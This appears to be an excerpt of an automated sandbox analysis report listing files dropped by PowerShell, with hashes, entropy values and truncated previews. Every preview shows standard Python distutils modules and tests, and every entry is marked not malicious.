                                                                                                                                                                                                            MD5:BCC1FCC84D1056F3614BFBA8306E4BFF
                                                                                                                                                                                                            SHA1:F53A14A29D2DC81E1D8C07665465C595F6D9BE88
                                                                                                                                                                                                            SHA-256:C13AE152D1BAA7ABDC319D8395AD195ECFFE68BFFEC6B7564A2829974A983277
                                                                                                                                                                                                            SHA-512:52DCDA9913CCCAE709B010E34243E8B51E9869AB084BB0F504F9BA4A3890A2D2843FFC06A108627F44A98696D4BD839BF2B714F3463E3C0AF9533E1440B1C865
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.extension....Provides the Extension class, used to describe C/C++ extension..modules in setup scripts."""....import os..import re..import warnings....# This class is really only used by the "build_ext" command, so it might..# make sense to put it in distutils.command.build_ext. However, that..# module is already big enough, and I want to make this class a bit more..# complex to simplify some common cases ("foo" module in "foo.c") and do..# better error-checking ("foo.c" actually exists)...#..# Also, putting this in build_ext.py means every setup script would have to..# import that large-ish module (indirectly, through distutils.core) in..# order to do anything.....class Extension:.. """Just a collection of attributes that describes an extension.. module and everything needed to build it (hopefully in a portable.. way, but there are hooks that let you be as unportable as you need)..... Instance attributes:.. name : string.. the full name of the exte
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18241
                                                                                                                                                                                                            Entropy (8bit):4.302813948141153
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:UNocvrjlUweSKQCDKeZ60sppsEsYG8kT9CI/f1o8yOgx/2qdw2TFCP33IWY6syd+:Ud/6pTO+6DdscTB1dwYoPIWYLy3yFn
                                                                                                                                                                                                            MD5:86FE139CB820F5491312AC03D4880D51
                                                                                                                                                                                                            SHA1:C4CB4719A913C5A1D2D07F06520A8976F612C7D3
                                                                                                                                                                                                            SHA-256:1D2ED826F86D339DBF44CA48A0FB4BEA8D23F4996FA010D8FB3A898ED42AEE08
                                                                                                                                                                                                            SHA-512:004A032009C27F60F93F5CE26F20D12C9FA4D98CA6B50A4BFBF276BB9772F2FD0D9BA80A2F1982658344613951FA88AAC4A52894F5E68E0287DCF615DF0589FB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.fancy_getopt....Wrapper around the standard getopt module that provides the following..additional features:.. * short and long options are tied together.. * options have help strings, so fancy_getopt could potentially.. create a complete usage summary.. * options set attributes of a passed-in object.."""....import sys, string, re..import getopt..from distutils.errors import *....# Much like command_re in distutils.core, this is close to but not quite..# the same as a Python NAME -- except, in the spirit of most GNU..# utilities, we use '-' in place of '_'. (The spirit of LISP lives on!)..# The similarities to NAME are again not a coincidence.....longopt_pat = r'[a-zA-Z](?:[a-zA-Z0-9-]*)'..longopt_re = re.compile(r'^%s$' % longopt_pat)....# For recognizing "negative alias" options, eg. "quiet=!verbose"..neg_alias_re = re.compile("^(%s)=!(%s)$" % (longopt_pat, longopt_pat))....# This is used to translate long options to legitimate Python identifiers..# (for use as att
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8386
                                                                                                                                                                                                            Entropy (8bit):4.4408860603035345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:E4Vw9lCQCIahMg/5D9eX23L3hv49oAk7QdcHBVxDQtRALn7jjz/irNrO:E4o3hE9FIYxCkyKVxSALn7T/irtO
                                                                                                                                                                                                            MD5:A20B1F020873571F620F7B8CBFCA7A30
                                                                                                                                                                                                            SHA1:793764E30782F2D20C33B027ACCECD9A7F8D4D4E
                                                                                                                                                                                                            SHA-256:485BEFF50549D7390CB8D3C84D57AAA2337CD10FF18F778339386CF4BEE42268
                                                                                                                                                                                                            SHA-512:52F7E983831F338C8889A77BDD3446500D915FA894EF270B8B7461C06E245C3860720651A47258A2A5C386FD11604877B502CAFC457BB6E0C4D17819B2A8D791
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.file_util....Utility functions for operating on single files..."""....import os..from distutils.errors import DistutilsFileError..from distutils import log....# for generating verbose output in 'copy_file()'.._copy_action = { None: 'copying',.. 'hard': 'hard linking',.. 'sym': 'symbolically linking' }......def _copy_file_contents(src, dst, buffer_size=16*1024):.. """Copy the file 'src' to 'dst'; both must be filenames. Any error.. opening either file, reading from 'src', or writing to 'dst', raises.. DistutilsFileError. Data is read/written in chunks of 'buffer_size'.. bytes (default 16k). No attempt is made to handle anything apart from.. regular files... """.. # Stolen from shutil module in the standard library, but with.. # custom error-handling added... fsrc = None.. fdst = None.. try:.. try:.. fsrc = open(src, 'rb').. except OSError as e:.. raise DistutilsFileErr
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13159
                                                                                                                                                                                                            Entropy (8bit):4.425042522912248
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dkpf0X2juFDQCcLNLnzcDURoSJuaJTKQQ/82/vTklxRZ5yYjB+in7nO:gU2GILNLnYARHuaAQbx5dj89
                                                                                                                                                                                                            MD5:F41E93FBB43F630430E76916AE47E30A
                                                                                                                                                                                                            SHA1:697CADDCF0A8B7D933A6E44CDE0DED0E0E499863
                                                                                                                                                                                                            SHA-256:FFAC6CD29B794373094BD27E2902659872F0EDD415AC6C422ED4709615AEBD0A
                                                                                                                                                                                                            SHA-512:2E1B30E4538F18B8AA51CB628F12691AAE923F64D8C598DC00921092F042CF4C8CFE889C6A413E01B276BE28C8B13935F139A3D6AFD129A26BB21198C8F559DC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.filelist....Provides the FileList class, used for poking about the filesystem..and building lists of files..."""....import os, re..import fnmatch..import functools..from distutils.util import convert_path..from distutils.errors import DistutilsTemplateError, DistutilsInternalError..from distutils import log....class FileList:.. """A list of files built by on exploring the filesystem and filtered by.. applying various patterns to what we find there..... Instance attributes:.. dir.. directory from which files will be taken -- only used if.. 'allfiles' not supplied to constructor.. files.. list of filenames currently being built/filtered/manipulated.. allfiles.. complete list of files under consideration (ie. without any.. filtering applied).. """.... def __init__(self, warn=None, debug_print=None):.. # ignore argument to FileList, but keep them for backwards.. # compatibility.. self.allfile
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2046
                                                                                                                                                                                                            Entropy (8bit):4.582700370897892
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:rOz4i3JqojNKloyDWj0gbsAcA+vlBO13GxuIIb7Yd3Y9ouoyFntJrhKQhQWOR:Cz4i4WIoiWjxsdrfqwh07o3KnHjhQ3
                                                                                                                                                                                                            MD5:90DE3ABE57090B62EE942ED0680A4AEA
                                                                                                                                                                                                            SHA1:7598193001434D26AFB5B7A8496A575E5A759198
                                                                                                                                                                                                            SHA-256:436FF055B5D2458B737308D84EBCCDE03D63ED736DB6FB612E254ED693DB1273
                                                                                                                                                                                                            SHA-512:931A1A89983745FBA8A7A6F6BDCAAF805D1F4E7C6C90DE8BFF90B26C6E57A4BD2238B318CDE85B294563977CDDC84105940514FFD955503765CDA91069D8A2FE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""A simple log mechanism styled after PEP 282."""....# The class here is styled after PEP 282 so that it could later be..# replaced with a standard Python logging implementation.....DEBUG = 1..INFO = 2..WARN = 3..ERROR = 4..FATAL = 5....import sys....class Log:.... def __init__(self, threshold=WARN):.. self.threshold = threshold.... def _log(self, level, msg, args):.. if level not in (DEBUG, INFO, WARN, ERROR, FATAL):.. raise ValueError('%s wrong log level' % str(level)).... if level >= self.threshold:.. if args:.. msg = msg % args.. if level in (WARN, ERROR, FATAL):.. stream = sys.stderr.. else:.. stream = sys.stdout.. try:.. stream.write('%s\n' % msg).. except UnicodeEncodeError:.. # emulate backslashreplace error handler.. encoding = stream.encoding.. msg = msg.encode(encoding, "backslas
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31241
                                                                                                                                                                                                            Entropy (8bit):4.492627746703902
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:1CSAAggE7oCkq68GNw2XbDdSXs6gJjlVaaQKcRNvuTp+xqUbaJOWLqINhVXETph9:1QAggE0CF9WD46R/hncKp+tr
                                                                                                                                                                                                            MD5:01EDAD07645F4C8098875F8B3FBCA850
                                                                                                                                                                                                            SHA1:6966AE6C5D623DCC6D2010A505D7DE9A2391C5DD
                                                                                                                                                                                                            SHA-256:0A6151B42962B0F403FEE76C9374386D920488423E9B69868EF6144C112FD520
                                                                                                                                                                                                            SHA-512:3D554D6926F030BB46FD4A84E68CCAA4D6FCB8AC344B17457223F77BE003E3C5F4B359354958EC6CC8DF06F9F02071871752559F68A7D99BBA9124B605B5E976
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.msvc9compiler....Contains MSVCCompiler, an implementation of the abstract CCompiler class..for the Microsoft Visual Studio 2008.....The module is compatible with VS 2005 and VS 2008. You can find legacy support..for older versions of VS in distutils.msvccompiler..."""....# Written by Perry Stoll..# hacked by Robin Becker and Thomas Heller to do a better job of..# finding DevStudio (through the registry)..# ported to VS2005 and VS 2008 by Christian Heimes....import os..import subprocess..import sys..import re....from distutils.errors import DistutilsExecError, DistutilsPlatformError, \.. CompileError, LibError, LinkError..from distutils.ccompiler import CCompiler, gen_lib_options..from distutils import log..from distutils.util import get_platform....import winreg....RegOpenKeyEx = winreg.OpenKeyEx..RegEnumKey = winreg.EnumKey..RegEnumValue = winreg.EnumValue..RegError = winreg.error....HKEYS = (winreg.HKEY_USERS,.. winreg.HKEY_CURRENT_U
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24183
                                                                                                                                                                                                            Entropy (8bit):4.431884613917693
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:hziQXgei1q68BKNBs08Jx6wVaaQKcRNvuTp+xuEETphRg6HCl:hzhXgeiM9BWE764hncKp+sg6HCl
                                                                                                                                                                                                            MD5:0C96D985AEFF35B798D316FB804BC1B9
                                                                                                                                                                                                            SHA1:A018B1D2C9240EB3BF44F7F805E387DBEC41D93D
                                                                                                                                                                                                            SHA-256:4C6888367DF7349C9649E9083CDC84202E1A31AFCA81AD775C9C0261A091DFD9
                                                                                                                                                                                                            SHA-512:7C26543B2E5F43C58FC7607F9970C44722D10D889AC90EBC1CFAECE6E6D1BB0201793B7E9AD496EB9D0ADF2764A267C5DB613A1BE39FC6301471B12D9183B8C3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.msvccompiler....Contains MSVCCompiler, an implementation of the abstract CCompiler class..for the Microsoft Visual Studio..."""....# Written by Perry Stoll..# hacked by Robin Becker and Thomas Heller to do a better job of..# finding DevStudio (through the registry)....import sys, os..from distutils.errors import \.. DistutilsExecError, DistutilsPlatformError, \.. CompileError, LibError, LinkError..from distutils.ccompiler import \.. CCompiler, gen_lib_options..from distutils import log...._can_read_reg = False..try:.. import winreg.... _can_read_reg = True.. hkey_mod = winreg.... RegOpenKeyEx = winreg.OpenKeyEx.. RegEnumKey = winreg.EnumKey.. RegEnumValue = winreg.EnumValue.. RegError = winreg.error....except ImportError:.. try:.. import win32api.. import win32con.. _can_read_reg = True.. hkey_mod = win32con.... RegOpenKeyEx = win32api.RegOpenKeyEx.. RegEnumKey = win32api.RegEnumKey.. Re
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4789
                                                                                                                                                                                                            Entropy (8bit):4.615863177055108
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:YPh9mP1krQ2u5sbrML3Q8qZk/nWYKHI80aNcQTB:Y59mzjebrMLgwWtHIkNcQTB
                                                                                                                                                                                                            MD5:DF25DC916FC0BC3A71A7BAC74C01C0A8
                                                                                                                                                                                                            SHA1:9274887ADC892C94C7B7955147CAD4DBC0955F96
                                                                                                                                                                                                            SHA-256:E4CEC9313928C0619540797094B8111A7963AD07B5C4005E5E082C72EE2B2BB0
                                                                                                                                                                                                            SHA-512:EB7D2BACF1649A84869C2258E845D1AFBBD0B563E517F028B60721984E9B098C14370E559C3E4C15156EE2FA6623608C79666084D81798AA1C6A4CC882FA410B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.spawn....Provides the 'spawn()' function, a front-end to various platform-..specific functions for launching another program in a sub-process...Also provides the 'find_executable()' to search the path for a given..executable name..."""....import sys..import os..import subprocess....from distutils.errors import DistutilsPlatformError, DistutilsExecError..from distutils.debug import DEBUG..from distutils import log......if sys.platform == 'darwin':.. _cfg_target = None.. _cfg_target_split = None......def spawn(cmd, search_path=1, verbose=0, dry_run=0):.. """Run another program, specified as a command list 'cmd', in a new process..... 'cmd' is just the argument list for the new process, ie... cmd[0] is the program to run and cmd[1:] are the rest of its arguments... There is no way to run a program with a name different from that of its.. executable..... If 'search_path' is true (the default), the system's executable.. search path will be used to fin
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12901
                                                                                                                                                                                                            Entropy (8bit):4.504946188697965
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:i+4AUJ3rsvAdI+9/AEGUGkPKGaGAigRKpFl7+CfUmtPFmM+1v+qms01M6v2FinQx:z4AUJ3vqgX+1+q6M5i6
                                                                                                                                                                                                            MD5:FBE345EC641A0F674C2963084DC51DB3
                                                                                                                                                                                                            SHA1:95885903A0DCED099A421E1ABCDC690C6608ECF6
                                                                                                                                                                                                            SHA-256:13F1A15709DC66576A7F727476A483DC7616AFC00E527FC248DA6A7797086AB6
                                                                                                                                                                                                            SHA-512:AB910E161149E93A9A65FBE64C000810D9870564BBEE3EB80E9DCFFDE436AD60D803D7A89F62CCDB4B6704CDD7C7969CCF4A5444550BDD64EE0544E4CD3BFE25
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Provide access to Python's configuration information. The specific..configuration variables available depend heavily on the platform and..configuration. The values may be retrieved using..get_config_var(name), and the list of variables is available via..get_config_vars().keys(). Additional convenience functions are also..available.....Written by: Fred L. Drake, Jr...Email: <fdrake@acm.org>.."""....import _imp..import os..import re..import sys..import warnings....from functools import partial....from .errors import DistutilsPlatformError....from sysconfig import (.. _PREFIX as PREFIX,.. _BASE_PREFIX as BASE_PREFIX,.. _EXEC_PREFIX as EXEC_PREFIX,.. _BASE_EXEC_PREFIX as BASE_EXEC_PREFIX,.. _PROJECT_BASE as project_base,.. _PYTHON_BUILD as python_build,.. _init_posix as sysconfig_init_posix,.. parse_config_h as sysconfig_parse_config_h,.... _init_non_posix,.. _is_python_source_dir,.. _sys_home,.... _variable_rx,.. _findvar1_rx,.. _fi
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2316
                                                                                                                                                                                                            Entropy (8bit):5.282952703364592
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:TjHz6OWrjdOWvfAhBLwJavNtC/I2F/7/R:TjHz1WrLfAfLGeNtCguzR
                                                                                                                                                                                                            MD5:DF9E521298E69638AB56F18A9FF4F6D4
                                                                                                                                                                                                            SHA1:9FF052BDDBC2BBBC175DC69E0FBA9673D91A9F74
                                                                                                                                                                                                            SHA-256:21171D590D7F57CFF24C6F223EA8A92BE0587B709CA7B8A6EC52CD8CD388DDB7
                                                                                                                                                                                                            SHA-512:FF88DEEA6DD10F175D78E53090976C392E850B8E0D907D2A9953FC4A04D6E1CB685BFBF3F9107A9A04FF3F0C8C6797C156E41279BE8A2780A43E8C84A6BAB18B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Setup file from the pygame project....#--StartConfig..SDL = -I/usr/include/SDL -D_REENTRANT -lSDL..FONT = -lSDL_ttf..IMAGE = -lSDL_image..MIXER = -lSDL_mixer..SMPEG = -lsmpeg..PNG = -lpng..JPEG = -ljpeg..SCRAP = -lX11..PORTMIDI = -lportmidi..PORTTIME = -lporttime..#--EndConfig....#DEBUG = -C-W -C-Wall..DEBUG = ....#the following modules are optional. you will want to compile..#everything you can, but you can ignore ones you don't have..#dependencies for, just comment them out....imageext src/imageext.c $(SDL) $(IMAGE) $(PNG) $(JPEG) $(DEBUG)..font src/font.c $(SDL) $(FONT) $(DEBUG)..mixer src/mixer.c $(SDL) $(MIXER) $(DEBUG)..mixer_music src/music.c $(SDL) $(MIXER) $(DEBUG).._numericsurfarray src/_numericsurfarray.c $(SDL) $(DEBUG).._numericsndarray src/_numericsndarray.c $(SDL) $(MIXER) $(DEBUG)..movie src/movie.c $(SDL) $(SMPEG) $(DEBUG)..scrap src/scrap.c $(SDL) $(SCRAP) $(DEBUG).._camera src/_camera.c src/camera_v4l2.c src/camera_v4l.c $(SDL) $(DEBUG)..pypm src/pypm.c $(SDL) $(PO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1425
                                                                                                                                                                                                            Entropy (8bit):4.487585439516729
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:mMZLuMIEH00iGuo+MTiMR4waMN1rArlxBxRZaiFtRCKVDww3HM+3/55xRhSrAopL:d7fiGuOTBy+N1rArlXnt1uw8I/55XhSL
                                                                                                                                                                                                            MD5:A723408A80C610347A528DCBA76CBAC7
                                                                                                                                                                                                            SHA1:CA822A63AE6DEA0AF876E6DEBAD9A90A0C1B7CFA
                                                                                                                                                                                                            SHA-256:93DBC76D083308D11463ADF5789BB43442F1FF57ABACDEABEA23349CB9E6F1AD
                                                                                                                                                                                                            SHA-512:D034F662E72258B83F85E82E64727491BE452F208625CA71AA059C9902A5F1B30663970AF470A876A671529F0EED182198107536D3D1BBE40420E4C57D7E1C89
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Test suite for distutils.....This test suite consists of a collection of test modules in the..distutils.tests package. Each test module has a name starting with..'test' and contains a function test_suite(). The function is expected..to return an initialized unittest.TestSuite instance.....Tests for the command classes in the distutils.command package are..included in distutils.tests as well, instead of using a separate..distutils.command.tests package, since command identification is done..by import rather than matching pre-defined names....."""....import os..import sys..import unittest..from test.support import run_unittest..from test.support.warnings_helper import save_restore_warnings_filters......here = os.path.dirname(__file__) or os.curdir......def test_suite():.. suite = unittest.TestSuite().. for fn in os.listdir(here):.. if fn.startswith("test") and fn.endswith(".py"):.. modname = "distutils.tests." + fn[:-3].. # bpo-40055: Save/restore
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.873140679513133
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:hWVFlPBA9yn:hqdBA0n
                                                                                                                                                                                                            MD5:9605CD64DE6D82DAAC01453FC2AEE5C9
                                                                                                                                                                                                            SHA1:9C74128DC18F5F0CA801B7D281E0A10AB80298D6
                                                                                                                                                                                                            SHA-256:86BEC3A28C9EDC7855C0519E3B2FA1F840813FCF8AE67A55F7183980DB20FE93
                                                                                                                                                                                                            SHA-512:9C2EE2CD62978B2A456F65F9D1779726D4982BEC8F3EFF207707308C1E5FE11D62BBC990948A7DCA68E4141AC8A903DD5F2D1AA54D9414B2AB880D3F7AFCD9A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:This should be included...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6699
                                                                                                                                                                                                            Entropy (8bit):4.5827258325541615
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:KD8WMSrsNajXjYNkncpsZMGlTC9Yv0EQirKh8MtKw1PD7LVrk0jeMm/dm2+cal2e:KDcwsEUOZMGA9YbrKh8oPrkKmB+/x
                                                                                                                                                                                                            MD5:43C09FF95CF314BB5B4FC55D45B07765
                                                                                                                                                                                                            SHA1:98040833065485839C40BC3C7E444F6B2B70AE20
                                                                                                                                                                                                            SHA-256:2DE5017C0B9525B676C2FCA11314CAE564E950C37000B4853134DFDC882C493D
                                                                                                                                                                                                            SHA-512:4882D4E00EBD4FB045FEC148A4C5E6C0B1220B8EA9F4E19FD88DF5C0E4A6772C945B250D9DFECEC279E18BAB87AB1572A5C14FD6BA520B3251BBF65A6F16B4C6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Support code for distutils test cases."""..import os..import sys..import shutil..import tempfile..import unittest..import sysconfig..from copy import deepcopy..from test.support import os_helper....from distutils import log..from distutils.log import DEBUG, INFO, WARN, ERROR, FATAL..from distutils.core import Distribution......class LoggingSilencer(object):.... def setUp(self):.. super().setUp().. self.threshold = log.set_threshold(log.FATAL).. # catching warnings.. # when log will be replaced by logging.. # we won't need such monkey-patch anymore.. self._old_log = log.Log._log.. log.Log._log = self._log.. self.logs = [].... def tearDown(self):.. log.set_threshold(self.threshold).. log.Log._log = self._old_log.. super().tearDown().... def _log(self, level, msg, args):.. if level not in (DEBUG, INFO, WARN, ERROR, FATAL):.. raise ValueError('%s wrong log level' % str(level))..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14771
                                                                                                                                                                                                            Entropy (8bit):4.659942819088458
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:DGuzSUlA/ukEs5pRz3saAWYITsWJHyqc5lg7wxkRfsoiXaxHdZ:DGuzS+4Es5p93LAn+Sx5y7wxkRfsoiK5
                                                                                                                                                                                                            MD5:7A948E7DB759BA18EE0D3806884C01CA
                                                                                                                                                                                                            SHA1:9BAEACDD4368FBE1906DA2062D1E61F5653C384C
                                                                                                                                                                                                            SHA-256:1C2AB1F4DB3B5029F6B38876634F49AB1362214FF4342E87296D57AF14A281C2
                                                                                                                                                                                                            SHA-512:BEA1B8B6C2204100A46F5842441AF0F96A34439E8D674002D77D889CB707ED02B027DF47A85ED93FD37B263CC4D0F87773A3D1D3C069CB93752B014D47EDE578
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-.."""Tests for distutils.archive_util."""..import unittest..import os..import sys..import tarfile..from os.path import splitdrive..import warnings....from distutils import archive_util..from distutils.archive_util import (check_archive_formats, make_tarball,.. make_zipfile, make_archive,.. ARCHIVE_FORMATS)..from distutils.spawn import find_executable, spawn..from distutils.tests import support..from test.support import run_unittest, patch..from test.support.os_helper import change_cwd..from test.support.warnings_helper import check_warnings....try:.. import grp.. import pwd.. UID_GID_SUPPORT = True..except ImportError:.. UID_GID_SUPPORT = False....try:.. import zipfile.. ZIP_SUPPORT = True..except ImportError:.. ZIP_SUPPORT = find_executable('zip')....try:.. import zlib.. ZLIB_SUPPORT = True..except ImportError:.. ZLIB_SUPPORT = False....try:.. import bz2..excep
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1820
                                                                                                                                                                                                            Entropy (8bit):4.483914792853877
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:O6qrj0sy1AkiHOEqz77sOPRGNQYmaWZOEW7xQlj/k++D5/aFI:Jqrj0sEijqX7sEGGYksqx/kh5//
                                                                                                                                                                                                            MD5:60BC2E984727D8F2B7239F8D0DA9D44E
                                                                                                                                                                                                            SHA1:23BB20DBCCFB57B771A4CAD93DCD7E98945C7B29
                                                                                                                                                                                                            SHA-256:E0D6A359B96B3910F58DA3893101DBADBB15F026507AD381604CFCB319AD8566
                                                                                                                                                                                                            SHA-512:51F02E6929667E511D1B7870167100BCEFDD69DDB24967C11F32DF38D9A5246EA4D724C0AF5E860E5796FF955F028113EA9501DE38ADB50BE9A44D912832816A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.bdist."""..import os..import unittest..from test.support import run_unittest....import warnings..with warnings.catch_warnings():.. warnings.simplefilter('ignore', DeprecationWarning).. from distutils.command.bdist import bdist.. from distutils.tests import support......class BuildTestCase(support.TempdirManager,.. unittest.TestCase):.... def test_formats(self):.. # let's create a command and make sure.. # we can set the format.. dist = self.create_dist()[1].. cmd = bdist(dist).. cmd.formats = ['msi'].. cmd.ensure_finalized().. self.assertEqual(cmd.formats, ['msi']).... # what formats does bdist offer?.. formats = ['bztar', 'gztar', 'msi', 'rpm', 'tar',.. 'xztar', 'zip', 'ztar'].. found = sorted(cmd.format_command).. self.assertEqual(found, formats).... def test_skip_build(self):.. # bug #10946: bdist --skip-build should t
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3002
                                                                                                                                                                                                            Entropy (8bit):4.748537023292781
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Oe0rLMYMybZMAGMYSlf9QkPX1A4gFqkWPU21YY72bA/msN+CEPng5vaFI:D0rLVNk8lA4lkQUWYGPmsNAg5v/
                                                                                                                                                                                                            MD5:B780B548F5D20F8BE102E22B032DB59F
                                                                                                                                                                                                            SHA1:185612A8ED40F1A05BC43D57AF01986FC81AF846
                                                                                                                                                                                                            SHA-256:FBAC9EE30E98E32B4EFB0029B9C318599F6ADEC75505541F4D89738F5A9F4271
                                                                                                                                                                                                            SHA-512:7F24C59176588D5BC4EB8620A9BBF76A9ABEEDB678E93C0BEE327E54E58046F65093275B1095D51A875133D14EEA2DE2BBD7F215830DDA0B25041F37D0005ECE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.bdist_dumb."""....import os..import sys..import zipfile..import unittest..from test.support import run_unittest....from distutils.core import Distribution..from distutils.command.bdist_dumb import bdist_dumb..from distutils.tests import support....SETUP_PY = """\..from distutils.core import setup..import foo....setup(name='foo', version='0.1', py_modules=['foo'],.. url='xxx', author='xxx', author_email='xxx')...."""....try:.. import zlib.. ZLIB_SUPPORT = True..except ImportError:.. ZLIB_SUPPORT = False......class BuildDumbTestCase(support.TempdirManager,.. support.LoggingSilencer,.. support.EnvironGuard,.. unittest.TestCase):.... def setUp(self):.. super(BuildDumbTestCase, self).setUp().. self.old_location = os.getcwd().. self.old_sys_argv = sys.argv, sys.argv[:].... def tearDown(self):.. os.chdir(self.old_location).. sys.argv = self
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):870
